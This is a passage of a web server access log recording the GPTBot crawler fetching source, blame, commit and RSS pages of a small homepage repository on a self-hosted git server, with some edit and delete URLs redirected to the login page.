"/windpacer/homepage/raw/branch/main/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" -[17/Feb/2026:15:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/.gitignore" [Client 74.7.227.38] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" -[17/Feb/2026:15:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/services" [Client 74.7.227.38] [Length 9776] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services" -[17/Feb/2026:15:11:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:15:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/images" -[17/Feb/2026:15:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets" [Client 74.7.227.38] [Length 11142] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" -[17/Feb/2026:15:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 14168] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" -[17/Feb/2026:15:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15775] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" -[17/Feb/2026:15:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 14866] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" -[17/Feb/2026:15:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 9767] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" -[17/Feb/2026:15:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13368] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services" -[17/Feb/2026:15:11:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/.gitignore" -[17/Feb/2026:15:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/.gitignore" -[17/Feb/2026:15:11:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/.gitignore" -[17/Feb/2026:15:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/.gitignore" -[17/Feb/2026:15:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/package.json" [Client 74.7.227.38] [Length 11219] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" -[17/Feb/2026:15:11:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" -[17/Feb/2026:15:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets" -[17/Feb/2026:15:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" -[17/Feb/2026:15:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/package.json" [Client 74.7.227.38] [Length 810] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" -[17/Feb/2026:15:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 826] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" -[17/Feb/2026:15:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" -[17/Feb/2026:15:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" -[17/Feb/2026:15:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" -[17/Feb/2026:15:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13190] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" -[17/Feb/2026:15:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" -[17/Feb/2026:15:11:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/package.json" -[17/Feb/2026:15:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/package.json" -[17/Feb/2026:15:11:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/package.json" -[17/Feb/2026:15:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/package.json" -[17/Feb/2026:15:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 14057] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" -[17/Feb/2026:15:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" -[17/Feb/2026:15:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 832] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" -[17/Feb/2026:15:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 14846] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" -[17/Feb/2026:15:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 16174] [Gzip 7.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 836] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" -[17/Feb/2026:15:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 812] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" -[17/Feb/2026:15:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" -[17/Feb/2026:15:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/status.json" [Client 74.7.227.38] [Length 11285] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/package.json" [Client 74.7.227.38] [Length 9765] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" -[17/Feb/2026:15:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 11410] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" -[17/Feb/2026:15:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json?display=source" [Client 74.7.227.38] [Length 11065] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" -[17/Feb/2026:15:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" -[17/Feb/2026:15:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" -[17/Feb/2026:15:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11283] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" -[17/Feb/2026:15:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" -[17/Feb/2026:15:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:15:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" -[17/Feb/2026:15:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fservices" [Client 74.7.227.38] [Length 25015] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" -[17/Feb/2026:15:11:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" -[17/Feb/2026:15:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/status.json" -[17/Feb/2026:15:11:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" -[17/Feb/2026:15:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/status.json" -[17/Feb/2026:15:11:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/tsconfig.json" -[17/Feb/2026:15:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/tsconfig.json" -[17/Feb/2026:15:11:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/tsconfig.json" -[17/Feb/2026:15:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/tsconfig.json" -[17/Feb/2026:15:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/status.json" [Client 74.7.227.38] [Length 10608] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" -[17/Feb/2026:15:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" -[17/Feb/2026:15:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/status.json" [Client 74.7.227.38] [Length 6228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" -[17/Feb/2026:15:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/status.json" [Client 74.7.227.38] [Length 11595] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" -[17/Feb/2026:15:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0" [Client 74.7.227.38] [Length 25661] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:15:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 